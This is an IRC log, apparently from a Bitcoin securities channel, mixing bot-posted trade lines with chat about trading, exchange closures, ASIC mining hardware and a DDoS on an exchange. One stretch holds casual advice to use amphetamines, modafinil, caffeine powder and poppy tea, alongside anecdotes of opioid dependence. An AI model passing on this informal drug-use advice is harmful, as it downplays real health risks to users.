17:47:29 [MPEX] [S.DICE] 119 @ 0.0046176 = 0.5495 BTC [-] Jan 15 17:47:41 "kakobrekla | assbot, bitbet and the rest of the world will return when the hdd od the server is changed, thanks for" Jan 15 17:48:19 hm? Jan 15 17:48:25 what is the issue? Jan 15 17:49:17 azx, kako runs teh matrix Jan 15 17:52:16 [HAVELOCK] [SDICE] 34 @ 0.48 = 16.32 BTC [-] Jan 15 17:59:03 [HAVELOCK] [SDICE] 9 @ 0.48 = 4.32 BTC [-] Jan 15 18:03:49 [MPEX] [S.DICE] 600 @ 0.00461761 = 2.7706 BTC [+] Jan 15 18:13:01 [MPEX] [S.DICE] 400 @ 0.00461761 = 1.847 BTC [+] Jan 15 18:13:03 [MPEX] [S.DICE] 702 @ 0.0046176 = 3.2416 BTC [-] Jan 15 18:13:03 [MPEX] [S.DICE] 1777 @ 0.00461332 = 8.1979 BTC [-] Jan 15 18:13:05 [MPEX] [S.DICE] 3400 @ 0.00461115 = 15.6779 BTC [-] Jan 15 18:13:06 [MPEX] [S.DICE] 721 @ 0.00460415 = 3.3196 BTC [-] Jan 15 18:16:51 *hanbot* r out for a few things, back by 7 :* Jan 15 18:20:06 [BTCTC] [GSDPT] 1 @ 0.0047 BTC [-] Jan 15 18:20:13 [BTCTC] [GSDPT] 1 @ 0.0047 BTC [-] Jan 15 18:22:54 [BTCTC] [GSDPT] 1 @ 0.0046 BTC [-] Jan 15 18:23:03 [HAVELOCK] [SDICE] 1 @ 0.48 BTC [-] Jan 15 18:23:05 [HAVELOCK] [SDICE] 9 @ 0.48 = 4.32 BTC [-] Jan 15 18:26:03 [MPEX] [S.DICE] 1000 @ 0.00463612 = 4.6361 BTC [+] Jan 15 18:26:05 [MPEX] [S.DICE] 2200 @ 0.00463611 = 10.1994 BTC [-] Jan 15 18:26:06 [MPEX] [S.DICE] 2307 @ 0.00460415 = 10.6218 BTC [-] Jan 15 18:27:06 [BTCTC] [GSDPT] 24 @ 0.0046 = 0.1104 BTC [-] Jan 15 18:28:00 [BTCTC] [GSDPT] 350 @ 0.0044 = 1.54 BTC [-] Jan 15 18:28:36 Free fall, free fall, everybody panic sell! :P Jan 15 18:34:36 meh Jan 15 18:34:49 it hit .00449 before Jan 15 18:35:02 I'll pick more up down there Jan 15 18:35:21 http://live.coinbr.com/?mpsic=S.DICE Jan 15 18:38:51 people are dumping profits and closing shortd Jan 15 18:38:53 shorts Jan 15 18:39:22 [MPEX] [S.DICE] 2613 @ 0.00464951 = 12.1492 BTC [+] Jan 15 18:39:24 [MPEX] [S.DICE] 337 @ 0.00460415 = 1.5516 BTC [-] Jan 15 18:41:04 I'll dump some at 0.00472+, daytrading is kinda fun Jan 15 18:43:26 [MPEX] [S.DICE] 298 @ 0.00467104 = 1.392 BTC [+] Jan 15 18:43:28 [MPEX] [S.DICE] 88 @ 0.0046823 = 0.412 BTC [+] Jan 15 18:44:03 *hanbot* bax. lol Dame Louise Lake-Tack Jan 15 18:49:29 Daytrading has a hell of a rush Jan 15 18:52:22 Explains why bankers use so much cocaine Jan 15 18:54:38 i buy cocaine for my bots. Jan 15 18:55:18 here assbot, you been up for weeks, have a line. Jan 15 18:56:02 you'd be better off with modafinil for the staying awake part Jan 15 18:57:05 but does that make them feel better too? Jan 15 18:57:31 I wish I had that stuff when I worked both a night shift and day shift at two different jobs in college Jan 15 18:57:55 [MPEX] [S.DICE] 706 @ 0.00460415 = 3.2505 BTC [-] Jan 15 18:57:57 [MPEX] [S.DICE] 94 @ 0.00459983 = 0.4324 BTC [-] Jan 15 18:58:11 there's only so much coffee and energy drinks you can consume before tiredness still takes over Jan 15 18:59:04 [HAVELOCK] [SDICE] 151 @ 0.48 = 72.48 BTC [-] Jan 15 18:59:08 [MPEX] [S.DICE] 19 @ 0.0046823 = 0.089 BTC [+] Jan 15 18:59:10 [MPEX] [S.DICE] 2150 @ 0.00471633 = 10.1401 BTC [+] Jan 15 18:59:10 [MPEX] [S.DICE] 2552 @ 0.00472657 = 12.0622 BTC [+] Jan 15 18:59:41 https://en.wikipedia.org/wiki/Paul_Erd%C5%91s#Personality Jan 15 19:00:18 Amphetamines are the choice for being focused, motivated and awake longer Jan 15 19:00:24 Korbman caffeine powder. Jan 15 19:00:51 It's meh, caffeine tends to produce a nasty tolerance pretty fast Jan 15 19:01:01 [MPEX] [S.DICE] 2406 @ 0.00459983 = 11.0672 BTC [-] Jan 15 19:01:04 True, but that shit is dangerous if you mismeasure it Jan 15 19:01:07 [MPEX] [S.DICE] 294 @ 0.00459927 = 1.3522 BTC [-] Jan 15 19:01:13 yep Jan 15 19:01:26 i used it a few years back for a while Jan 15 19:01:42 72hrs uptime was ez Jan 15 19:01:47 ;> Jan 15 19:03:43 [MPEX] [S.DICE] 2036 @ 0.00472657 = 9.6233 BTC [+] Jan 15 19:03:45 [MPEX] [S.DICE] 164 @ 0.00473843 = 0.7771 BTC [+] Jan 15 19:05:01 I hate the fact, that I have to go through caffeine withdrawals after a major exam Jan 15 19:05:16 dont start to get off it Jan 15 19:05:22 fixed. Jan 15 19:06:00 hahaha Jan 15 19:08:51 [MPEX] [S.DICE] 436 @ 0.00473843 = 2.066 BTC [+] Jan 15 19:08:52 [MPEX] [S.DICE] 614 @ 0.00474899 = 2.9159 BTC [+] Jan 15 19:10:03 [MPEX] [S.DICE] 36 @ 0.00474899 = 0.171 BTC [+] Jan 15 19:10:09 [MPEX] [S.DICE] 219 @ 0.004749 = 1.04 BTC [+] Jan 15 19:10:11 [MPEX] [S.DICE] 1849 @ 0.00475 = 8.7828 BTC [+] Jan 15 19:23:04 [MPEX] [S.DICE] 181 @ 0.004749 = 0.8596 BTC [-] Jan 15 19:23:06 [MPEX] [S.DICE] 2019 @ 0.00475 = 9.5903 BTC [+] Jan 15 19:23:13 modafinil works well Jan 15 19:23:46 not as 'fun' but effective for focus Jan 15 19:23:56 when you absolutely need to focus for 12 hours. Jan 15 19:26:04 I only use caffeine and piracetam if I must learn hard Jan 15 19:28:03 Poppy tea orso after a passed exam is a different matter. Thank god for greyzone laws on dried poppies here Jan 15 19:28:54 "The tea is consumed for its narcotic, analgesic, and anti-diarrheal effects" Jan 15 19:29:31 Don't forget the euphoric and relaxing properties Jan 15 19:32:04 [MPEX] [S.DICE] 1232 @ 0.00469621 = 5.7857 BTC [-] Jan 15 19:34:04 [MPEX] [S.DICE] 300 @ 0.00469621 = 1.4089 BTC [-] Jan 15 19:44:21 [HAVELOCK] [SDICE] 10 @ 0.48 = 4.8 BTC [-] Jan 15 19:47:04 [MPEX] [S.DICE] 2000 @ 0.00472154 = 9.4431 BTC [+] Jan 15 19:47:06 [MPEX] [S.DICE] 658 @ 0.00473 = 3.1123 BTC [+] Jan 15 19:51:23 [MPEX] [S.DICE] 358 @ 0.00473 = 1.6933 BTC [+] Jan 15 19:52:54 [MPEX] [S.DICE] 1747 @ 0.0047419 = 8.2841 BTC [+] Jan 15 19:53:07 trust Bugpowder he is a neurosurgeon Jan 15 19:54:18 yeah you get hooked on it in about 2 weeks Jan 15 19:54:24 and hooked off in the same period Jan 15 19:54:37 it makes more sense to go on and off it Jan 15 19:55:23 kakobrekla: sounds like "moderation" Jan 15 19:55:47 thestrin1puller, everything in moderation, even moderation Jan 15 19:56:00 Yea, but I meant the kind with terrible headaches and feeling tired for a couple of days, since I don't drink coffee if I don't have to Jan 15 19:57:36 american.jpg Jan 15 19:58:29 [MPEX] [S.DICE] 1495 @ 0.0047419 = 7.0891 BTC [+] Jan 15 19:58:32 [MPEX] [S.DICE] 3018 @ 0.00469621 = 14.1732 BTC [-] Jan 15 19:58:34 [MPEX] [S.DICE] 2932 @ 0.0046825 = 13.7291 BTC [-] Jan 15 20:00:57 i go through withdrawals fairly regularly Jan 15 20:01:21 caffeine and nicotine both Jan 15 20:01:33 i binge on both of those and then will go back to cold turkey Jan 15 20:02:15 ahh, how's the drama ? Jan 15 20:02:19 Same with nicotine, it's just that I'm exposed to caffeine for about 3 weeks on occasion so it's a tad harder Jan 15 20:02:23 i used to be seriously dependent on both fentanyl and oxycodone a few years back Jan 15 20:02:44 i smoke when i drink Jan 15 20:02:53 so i'll smoke like a pack or two in a night Jan 15 20:03:11 and then days of feeling like crap Jan 15 20:03:27 !ticker btctc gsdpt Jan 15 20:03:29 [BTCT:GSDPT] 1D: 0.0044 / 0.0044 / 0.007 (381 shares, 1.7 BTC), 7D: 0.0042 / 0.01 / 0.0075 (655 shares, 3.6 BTC), 30D: 0.0042 / 0.01 / 0.0075 (655 shares, 3.6 BTC) Jan 15 20:03:32 i do that pretty regularly, the nicotine withdrawal feeling Jan 15 20:03:35 jesus this is like tongue twister exchange Jan 15 20:03:46 haha Jan 15 20:03:51 fentanyl is worse than heroin i hear Jan 15 20:04:00 to withdraw from Jan 15 20:04:15 fentanyl was like 2 full weeks of the trainspotting scene Jan 15 20:04:25 except i had to work Jan 15 20:04:41 well, fentanyl is like 100x Jan 15 20:04:46 i'm pretty sure i flew to Des Moines to install some servers during my narcotics detox Jan 15 20:04:49 shrug Jan 15 20:05:06 the pain was exquisite Jan 15 20:05:10 i'll say that Jan 15 20:05:17 Poppy pods are great to enjoy, but awful if you get addicted to them Jan 15 20:05:37 prescription Jan 15 20:05:45 50 micrograms every 48 hours Jan 15 20:05:48 Schadenfreude, Bugpowder did you two see my latest production ? Jan 15 20:06:59 damn mircea_popescu you make friends Jan 15 20:07:04 [MPEX] [S.DICE] 1818 @ 0.0046825 = 8.5128 BTC [-] Jan 15 20:07:05 lol Jan 15 20:07:05 [MPEX] [S.DICE] 525 @ 0.00466414 = 2.4487 BTC [-] Jan 15 20:07:31 look i can re-arrange it Jan 15 20:07:37 i have this advantage that i get high on my own neurotransmitters, as my sister put it. of course everyone wants to be friends with me. Jan 15 20:07:39 damn you, mircea_popescu, make friends Jan 15 20:08:05 i'm new here Jan 15 20:08:11 where do i throw my money? Jan 15 20:08:14 which pile Jan 15 20:08:17 [MPEX] [S.DICE] 2226 @ 0.00475 = 10.5735 BTC [+] Jan 15 20:08:19 [MPEX] [S.DICE] 174 @ 0.00475094 = 0.8267 BTC [+] Jan 15 20:08:29 assbot just told you. Jan 15 20:08:47 jeez Jan 15 20:09:21 blogpost on buffer? Jan 15 20:09:26 yeah, put it on glbse rather Jan 15 20:09:37 oh i remember them Jan 15 20:10:02 anyone remember namworld's link for bvps statement ? Jan 15 20:10:13 i've got it somewhere... Jan 15 20:10:31 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdDFvQWJnZnRZQWJfbk1mNHYtVzhPR0E#gid=0 Jan 15 20:10:33 danke Jan 15 20:10:48 jcpham There are a variety of good options Jan 15 20:10:51 waiiiiit rewind Jan 15 20:10:54 " better than expected." Jan 15 20:10:56 srsly?? Jan 15 20:11:03 GLBSE was better than expected? Jan 15 20:11:18 well i must say i admire your humble expectations. Jan 15 20:11:36 who on my ignore are we talking to ? Jan 15 20:11:46 19:10.07 ( EskimoBob ) it's gone! and everyone got their coin back. better than expected. Jan 15 20:11:56 jcpham, Hard to say which security will do the best in the coming months, depends on the revenue growth. So just buy a little of S.MPOE, S.BVPS, S.DICE and S.BBET Jan 15 20:11:57 a a Jan 15 20:11:59 EskimoBob: just thought i had it handy. :3 Jan 15 20:12:06 [MPEX] [S.DICE] 2250 @ 0.00466414 = 10.4943 BTC [-] Jan 15 20:12:09 some will go up, some might go down Jan 15 20:12:14 Bugpowder : i envisage funds won't be far off yet. Jan 15 20:12:22 actual investment decisions to be pondered nao. Jan 15 20:12:39 Well, I'm basically doing that for my friends Jan 15 20:12:44 right now Jan 15 20:12:52 no but i meant people who know what they're doing Jan 15 20:12:56 :D Jan 15 20:13:25 well, people that actually set it up more official than a google doc Jan 15 20:13:37 i kid, i kid Jan 15 20:14:04 EskimoBob wtf were you doing on glbse if that outcome came over your expectations' Jan 15 20:14:11 Let me dry my tears with all these extra bitcoins I made this month Jan 15 20:14:14 lol Jan 15 20:14:20 [BTCTC] [COGNITIVE] 1 @ 0.459 BTC [+] Jan 15 20:14:23 kakobrekla he was talking. it worked a lot better. Jan 15 20:14:42 [BTCTC] [COGNITIVE] 2 @ 0.459 = 0.918 BTC [+] Jan 15 20:15:09 [BTCTC] [COGNITIVE] 5 @ 0.46 = 2.3 BTC [+] Jan 15 20:15:21 so now we need eskimobob english to english translator? Jan 15 20:15:32 well, that went ok for me, although it would have been nice if the asset prices hadn't crashed as people were racing to the exits. Jan 15 20:15:33 [BTCTC] [COGNITIVE] 2 @ 0.476 = 0.952 BTC [+] Jan 15 20:15:50 apparently Jan 15 20:16:08 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.22458623 = 224.5862 BTC [-] Jan 15 20:16:52 ill use +b if it comes to it Jan 15 20:17:13 shoulda got out as soon as that youtube video of him at the conference got out Jan 15 20:17:35 "Have you actually talked to a lawyer? I think maybe you should, very soon!" Jan 15 20:17:56 ;;seen smickles Jan 15 20:17:56 smickles was last seen in #bitcoin-assets 15 hours, 4 minutes, and 47 seconds ago: well, so far i'm doing alright, and this is the test month Jan 15 20:18:45 anyone have link to mpoe public finance report for dec Jan 15 20:18:59 http://trilema.com/mpoe-december-2012-statement Jan 15 20:20:34 [MPEX] [S.DICE] 6826 @ 0.00475094 = 32.4299 BTC [+] Jan 15 20:20:36 [MPEX] [S.DICE] 1224 @ 0.00475101 = 5.8152 BTC [+] Jan 15 20:20:47 http://www.youtube.com/watch?v=vmPD_YSQ--k&t=25m15s Jan 15 20:21:30 who said i wasnt? Jan 15 20:21:46 well then stop yappin bout it Jan 15 20:22:32 you certanly dont give that impression here :) Jan 15 20:22:41 lol Jan 15 20:25:42 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.22453777 = 224.5378 BTC [-] Jan 15 20:26:26 [HAVELOCK] [SDICE] 1 @ 0.48 BTC [-] Jan 15 20:26:31 so there's a drop expected in btc or what. Jan 15 20:27:53 what do I know... Jan 15 20:28:21 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.16451239 = 164.5124 BTC [-] Jan 15 20:28:28 !ticker Jan 15 20:28:29 Provide exchange and ticker. Jan 15 20:28:38 !ticker m s.dice Jan 15 20:28:40 [MPEX:S.DICE] 1D: 0.00449034 / 0.00465126 / 0.00475112 (494978 shares, 2,302.28 BTC), 7D: 0.00449 / 0.00466409 / 0.0048 (2057653 shares, 9,597.09 BTC), 30D: 0.0014 / 0.0035971 / 0.0048 (12252072 shares, 44,072.03 BTC) Jan 15 20:30:46 !ticker h sdice Jan 15 20:30:47 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.48049655 / 0.48900000 (290 shares, 139.34400000 BTC), 7D: 0.47500000 / 0.48166574 / 0.50000000 (1080 shares, 520.19900000 BTC), 30D: 0.37000000 / 0.45280971 / 0.62000000 (3500 shares, 1584.83399998 BTC) Jan 15 20:31:45 http://newsroom.fb.com/News/562/Introducing-Graph-Search-Beta Jan 15 20:32:16 ow fuck Jan 15 20:32:22 ok, now that's a brilliant idea Jan 15 20:32:35 if there were a box into which i could go "hey, there was this graph like so and so somewhere" Jan 15 20:32:37 and it found it... Jan 15 20:32:38 o god. Jan 15 20:34:17 [MPEX] [S.DICE] 2450 @ 0.00466415 = 11.4272 BTC [-] Jan 15 20:34:31 i think they just kinda reinvented the EFnet sex chart Jan 15 20:36:33 but not ascii heheheh Jan 15 20:36:56 [MPEX] [S.MPOE] 12047 @ 0.00066 = 7.951 BTC [+] Jan 15 20:38:47 http://i.imgur.com/jvRBy.jpg Jan 15 20:39:19 nsfw? Jan 15 20:39:34 I totally agree with this statement "It is, I submit, a lot easier to be a star in BTC than it is in fiat, simply because so many more intelligent people (that aren’t computer programmers!) are involved with the latter as opposed to the former." Jan 15 20:40:06 [MPEX] [S.DICE] 3350 @ 0.00467416 = 15.6584 BTC [+] Jan 15 20:41:16 [MPEX] [S.DICE] 3096 @ 0.00475101 = 14.7091 BTC [+] Jan 15 20:41:56 pigeons https://bitcointalk.org/index.php?topic=112447.msg1455855#msg1455855 did you do that ? Jan 15 20:42:00 haha, "only 23 years old" Jan 15 20:44:09 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.22443673 = 224.4367 BTC [-] Jan 15 20:44:23 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.16440693 = 164.4069 BTC [-] Jan 15 20:44:48 who's buying those? Jan 15 20:46:31 mircea_popescu You are wrong about buffet. Jan 15 20:46:43 He is currently up big on his short put contracts Jan 15 20:46:45 Buglouse tt. and on which score ? Jan 15 20:46:59 Closed some of them for 50% profit already Jan 15 20:47:07 wait, this was cca 2009 Jan 15 20:47:19 he went from 70 to 40 bn nw or some shit Jan 15 20:47:28 1/3 of that was index puts Jan 15 20:47:29 using black-scholes valuation modes Jan 15 20:47:31 model Jan 15 20:47:47 yea, which alone is funny Jan 15 20:47:53 which, not sure if its really the right model for those long dated things Jan 15 20:47:54 seeing what he thinks of price-based evaluation models lol Jan 15 20:48:12 man Jan 15 20:48:22 Anyone got BTCT.co/BitFunder/Cryptostock stuff? Looking for things to short. Jan 15 20:51:16 [HAVELOCK] [SDICE] 2 @ 0.48 = 0.96 BTC [-] Jan 15 20:52:15 I hope the options buyer keeps buying the puts Jan 15 20:54:46 im bullish on btc Jan 15 20:55:21 it seems hard to find a lot of downside at this stage of the game Jan 15 20:56:12 :( Jan 15 20:56:27 I made puts but the buyer isn't buying anymore Jan 15 20:56:36 Is that 2% fee on the total deposit? Jan 15 20:56:47 !ticker m O.BTCUSD.P140 Jan 15 20:56:48 Hell, ain't we about more fucked than a whore at closin' time, huh? Jan 15 20:57:16 need the T|N on the end there thestringpuller Jan 15 20:57:26 !ticker m O.BTCUSD.P140T Jan 15 20:57:28 [MPEX:O.BTCUSD.P140T] 1D: 0.01029943 / 0.11550245 / 0.11587618 (565 shares, 65.26 BTC), 7D: 0.01029943 / 0.11470805 / 0.12379657 (572 shares, 65.61 BTC), 30D: 0.01029943 / 0.10639863 / 0.168 (3678 shares, 391.33 BTC) Jan 15 20:57:29 forgot Jan 15 20:57:36 :] Jan 15 20:58:00 ;;calc (14 - 13.50) / 13.50 Jan 15 20:58:00 0.037037037037 Jan 15 20:58:25 !ticker m O.BTCUSD.C140T Jan 15 20:58:26 [MPEX:O.BTCUSD.C140T] 1D: 0.10808014 / 0.10808014 / 0.10808014 (10 shares, 1.08 BTC), 7D: 0.0164898 / 0.10950172 / 0.14775821 (23 shares, 2.52 BTC), 30D: 0.01359389 / 0.02685208 / 0.19999999 (1051 shares, 28.22 BTC) Jan 15 20:58:54 i feel like it really wants to break out here... im a cash buyer for sure at $10, but i've been really wanting to grab some more quick before it hits 20 Jan 15 20:59:25 im not saying anything in particular about his position Jan 15 20:59:39 tbh i think 20 is more likely than 10 at this point Jan 15 20:59:42 but what do i know Jan 15 20:59:57 thats what she said mod6 Jan 15 21:00:18 [MPEX] [S.DICE] 3680 @ 0.00475101 = 17.4837 BTC [+] Jan 15 21:00:24 [MPEX] [S.DICE] 870 @ 0.00475103 = 4.1334 BTC [+] Jan 15 21:01:14 I hardly see why not... Jan 15 21:01:18 i feel like that was kinda concervitive. i think we might add another zero to the end of that before too long here. Jan 15 21:01:26 *conservitive Jan 15 21:01:50 Namworld bfl. Jan 15 21:03:29 hmm Jan 15 21:03:31 "blocks" : 191463, Jan 15 21:03:38 maybe so... the asics are a huge let down so far. Jan 15 21:03:47 this is getting silly Jan 15 21:04:07 i was even hoping to get a few of these going in '13 also (asics) Jan 15 21:04:27 i didnt pre-order anything, because I'm a wait and see type usually... Jan 15 21:04:57 But, I am hopful that someone will put together an orginization that can turn out a stable asic product this year. Jan 15 21:05:10 I think BFL is going to eventually ship. The scam is collecting money a year or more before they actually ship Jan 15 21:05:22 i KNEW they were going to have issues with the packaging Jan 15 21:05:27 I have no idea who, or what, but I remain hopful that someone can turn these things out efficiantly and have them be reliable. Jan 15 21:05:28 flip chip Jan 15 21:05:55 EskimoBob tru Jan 15 21:06:05 the pic that bfl showed is not a flipchip Jan 15 21:06:05 i didnt pre-order anything, because I'm a wait and see type usuall << seriously wise in this case Jan 15 21:06:09 the core pic Jan 15 21:06:15 kakobrekla exactly. Jan 15 21:06:23 i suspect they just cull off interwebs by now. Jan 15 21:06:42 EskimoBob: like make pottery cups? Jan 15 21:07:12 [BTCTC] [GSDPT] 5 @ 0.0047 = 0.0235 BTC [+] Jan 15 21:07:34 yeah, im more interested in the asics for personal btc mining and some research Jan 15 21:07:45 dude everyone has made a pottery cup when they were 4-5 years old Jan 15 21:07:55 I have this dream to build a really extensive elastic asic network Jan 15 21:08:42 like, on demand Jan 15 21:08:59 [MPEX] [S.DICE] 876 @ 0.00475103 = 4.1619 BTC [+] Jan 15 21:09:18 anyway, a long ways off. i want to see what I can build with these things. Jan 15 21:09:19 [BTCTC] [COGNITIVE] 10 @ 0.44 = 4.4 BTC [-] Jan 15 21:09:24 along with some rasberry pi's Jan 15 21:09:53 *raspberry Jan 15 21:09:58 god my spelling is bad. Jan 15 21:10:11 no thats a stupid word Jan 15 21:10:26 [BTCTC] [BASIC-MINING] 33 @ 0.3299 = 10.8867 BTC [-] Jan 15 21:10:26 what is? Jan 15 21:10:26 [BTCTC] [BASIC-MINING] 2 @ 0.33 = 0.66 BTC [+] Jan 15 21:10:36 [HAVELOCK] [SDICE] 4 @ 0.48 = 1.92 BTC [-] Jan 15 21:10:41 also, isnt want you can build with a sha2 hashing asic fairly limited, to hashign sha2? Jan 15 21:10:49 mod6: raspberry Jan 15 21:10:57 oh hehe Jan 15 21:11:18 well, i believe that with the asic you can program the array anyway you wish really... Jan 15 21:11:36 cook eggs Jan 15 21:11:49 and i was thinking if it was something like UCS, but instead of just CPUs, it could be large cards of FPGAs Jan 15 21:11:49 mod6: not afaik, you're thinking fpga? Jan 15 21:12:04 and in a distributed network you could have a cloud of fpga's Jan 15 21:12:29 asics != fpga in any way Jan 15 21:12:30 dub: oh maybe i am Jan 15 21:12:51 those things may be used to possibly fold, for instance, but only if you do some transforms on the fold problem to make it like a hash Jan 15 21:12:59 im talking about the same thing as the guy was trying to sell from BTC FPGA Jan 15 21:13:02 so that thing yeah Jan 15 21:13:19 sorry, im wicked tired Jan 15 21:13:41 [MPEX] [S.DICE] 2600 @ 0.00475103 = 12.3527 BTC [+] Jan 15 21:14:05 anyway, was a dream I had this morning Jan 15 21:14:11 who knows :D Jan 15 21:15:20 mod6 due to painfully obvious market inefficiency i would say by the time 3rd generation asics are here Jan 15 21:15:28 we will be awash in useless chips to do any research w/e Jan 15 21:16:20 hmm.. yeah, we'll just have to see what these guys can come up with Jan 15 21:18:48 [MPEX] [S.DICE] 3100 @ 0.00471726 = 14.6235 BTC [-] Jan 15 21:20:14 so, ok yeah. i see that they are different from this chart Jan 15 21:20:16 https://en.bitcoin.it/wiki/Mining_hardware_comparison Jan 15 21:23:58 basically an asic is burned in silicon Jan 15 21:24:09 a fpga is more like an old flashable bios Jan 15 21:35:25 [MPEX] [S.DICE] 2100 @ 0.00472941 = 9.9318 BTC [+] Jan 15 21:35:27 [MPEX] [S.DICE] 1400 @ 0.00471726 = 6.6042 BTC [-] Jan 15 21:37:14 i see. Jan 15 21:37:35 [MPEX] [S.DICE] 2654 @ 0.00475103 = 12.6092 BTC [+] Jan 15 21:37:36 [MPEX] [S.DICE] 1196 @ 0.00475106 = 5.6823 BTC [+] Jan 15 21:39:32 [MPEX] [S.DICE] 750 @ 0.00471726 = 3.5379 BTC [-] Jan 15 21:39:36 well kinda Jan 15 21:42:06 mircea_popescu: good layman explanation Jan 15 21:42:23 mircea_popescu: good response to the ddos too Jan 15 21:42:46 fpga has is an array of various logic units that can operate in a number of ways, you give it a program of sorts telling it what you want them to behave and route between each other Jan 15 21:42:50 did you ever find out if it was a dns attack or direct to your ip? Jan 15 21:43:03 i was thinking with the way that the fpga could be reprogrammed on the fly, it could be used in an elastic environment Jan 15 21:43:12 and low power! :D Jan 15 21:43:15 s/what/how Jan 15 21:43:16 thestringpuller it took out the entire gold network at gnax atlanta. Jan 15 21:43:28 but we're pretty certain it was directed at mpex.co Jan 15 21:43:45 it took out a gold networm? Jan 15 21:43:50 network* Jan 15 21:43:57 asic is bascially taking that 'program' and building somethign specific for it Jan 15 21:44:18 http://gold.gnax.net/ << that Jan 15 21:45:06 hence the Feild Programable and Application Specific portions Jan 15 21:48:19 [BTCTC] [ESECURITYSABTC] 1 @ 0.79 BTC [-] Jan 15 21:58:21 [MPEX] [O.BTCUSD.C120T] 500 @ 0.2328178 = 116.4089 BTC [+] Jan 15 21:58:23 [MPEX] [O.BTCUSD.C130T] 750 @ 0.17610041 = 132.0753 BTC [+] Jan 15 22:00:08 [MPEX] [S.DICE] 750 @ 0.00474618 = 3.5596 BTC [+] Jan 15 22:00:09 [MPEX] [S.DICE] 3000 @ 0.00471726 = 14.1518 BTC [-] Jan 15 22:05:30 [MPEX] [S.MPOE] 11450 @ 0.00065936 = 7.5497 BTC [-] Jan 15 22:06:13 [MPEX] [S.DICE] 734 @ 0.00471726 = 3.4625 BTC [-] Jan 15 22:07:32 mircea_popescu: did the dos come with an extortion attempt or anything? Jan 15 22:07:41 [MPEX] [S.DICE] 1600 @ 0.00474093 = 7.5855 BTC [+] Jan 15 22:07:53 dub no contact. Jan 15 22:10:22 [MPEX] [S.BVPS] 156 @ 0.00635539 = 0.9914 BTC [-] Jan 15 22:14:00 [MPEX] [S.DICE] 2500 @ 0.00471726 = 11.7932 BTC [-] Jan 15 22:16:21 [BTCTC] [COGNITIVE] 5 @ 0.4111 = 2.0555 BTC [-] Jan 15 22:19:14 [BTCTC] [COGNITIVE] 13 @ 0.411 = 5.343 BTC [-] Jan 15 22:20:29 [BTCTC] [BASIC-MINING] 15 @ 0.33 = 4.95 BTC [+] Jan 15 22:22:08 *yawn* Jan 15 22:22:14 omg Jan 15 22:23:28 ... I want to short some of these... Jan 15 22:23:40 gah, I'm sooo bored at work today Jan 15 22:23:47 Sure no one has something they'd lend for a fee? Jan 15 22:24:02 I feel like short selling. Jan 15 22:24:10 [MPEX] [S.DICE] 1616 @ 0.00471726 = 7.6231 BTC [-] Jan 15 22:24:12 [MPEX] [S.DICE] 384 @ 0.00471725 = 1.8114 BTC [-] Jan 15 22:25:05 smickles dors Jan 15 22:25:07 does Jan 15 22:25:16 .2% Jan 15 22:25:47 you wanna short basic mining ?! Jan 15 22:26:11 what is basicmining Jan 15 22:26:13 Not just that =/ Jan 15 22:26:20 [MPEX] [S.DICE] 450 @ 0.00474093 = 2.1334 BTC [+] Jan 15 22:26:28 [BTCTC] [GSDPT] 450 @ 0.0047 = 2.115 BTC [+] Jan 15 22:26:54 i have no choice but continue to mine & hoard Jan 15 22:27:21 hoarding if for hoardes Jan 15 22:27:32 is Jan 15 22:27:36 if=is Jan 15 22:27:39 i set my pool payout address to 1Dice because i can Jan 15 22:27:41 motherfuck. Jan 15 22:27:47 hahaha Jan 15 22:28:17 looks like mpoe-pr has heard my plea for succinct sample of her personality Jan 15 22:28:19 https://bitcointalk.org/index.php?topic=102181.msg1456179#msg1456179 Jan 15 22:32:07 lol Jan 15 22:32:29 jcpham it's all just hashing right ? Jan 15 22:33:59 one big house of cards Jan 15 22:34:10 you can thank me later for propping it up Jan 15 22:34:26 i'd rather thank you now than later at 107% Jan 15 22:34:33 haha Jan 15 22:37:11 "Another delay we've had to endure is the fact that we have effectively tied the ASIC teams payment to the success of the chip. If the chip were to be a failure they don't get paid... so they have incentive to get it right but that has made them very cautious and slow to approve final masks" Jan 15 22:37:16 sounds like a fine way to not have a team. Jan 15 22:37:28 i never heard of engineers working on that sort of retainer. Jan 15 22:37:32 or doctors, for that matter. Jan 15 22:37:34 lawyers rarely do. Jan 15 22:38:58 I know some lawyers that do Jan 15 22:39:04 especially if they know they have a solid case Jan 15 22:39:59 My wife does Jan 15 22:40:02 there are plenty of blue collar jobs that use the same system, particularly in agriculture Jan 15 22:40:07 it is way more lucrative than hourly Jan 15 22:40:21 if you have the right case pipeline Jan 15 22:40:37 exactly Jan 15 22:40:58 and if you're a fast and accurate worker, you can surpass hourly workers regularly Jan 15 22:42:17 [MPEX] [S.DICE] 116 @ 0.00471725 = 0.5472 BTC [-] Jan 15 22:42:20 [MPEX] [S.DICE] 2767 @ 0.00470902 = 13.0299 BTC [-] Jan 15 22:42:22 [MPEX] [S.DICE] 900 @ 0.00466459 = 4.1981 BTC [-] Jan 15 22:42:23 [MPEX] [S.DICE] 179 @ 0.00466414 = 0.8349 BTC [-] Jan 15 22:45:26 In my limited experience with silicon mfg contracting, you send a detailed spec sheet. If they don't meet the spec, they don't get paid. Jan 15 22:45:52 you're talking production Jan 15 22:45:57 he's talking design. Jan 15 22:45:59 Of course, there is a discussion about the spec Jan 15 22:46:09 between the mfg and the designer Jan 15 22:46:14 ok Jan 15 22:46:22 Bugpowder and yes some lawyers do, but only when they make more that way Jan 15 22:46:30 which is moot since he;'s arguing it as a cost reduction measure Jan 15 22:46:36 rather than as an expensive financing option. Jan 15 22:47:05 in general you should be able to borrow to pay a fixed retainer rather than have to offer the laywer a % as in personal injury cases Jan 15 22:53:56 [MPEX] [S.DICE] 350 @ 0.00466414 = 1.6324 BTC [-] Jan 15 23:01:20 [MPEX] [S.DICE] 196 @ 0.00466414 = 0.9142 BTC [-] Jan 15 23:01:22 [MPEX] [S.DICE] 264 @ 0.00465692 = 1.2294 BTC [-] Jan 15 23:07:40 Hmm, looks like Gigavps has actually started paying people... Jan 15 23:08:04 indeed Jan 15 23:09:25 hooray! Jan 15 23:11:08 [BTCTC] [ESECURITYSABTC] 1 @ 0.79 BTC [-] Jan 15 23:12:56 [MPEX] [S.DICE] 50 @ 0.00474093 = 0.237 BTC [+] Jan 15 23:12:58 [MPEX] [S.DICE] 2179 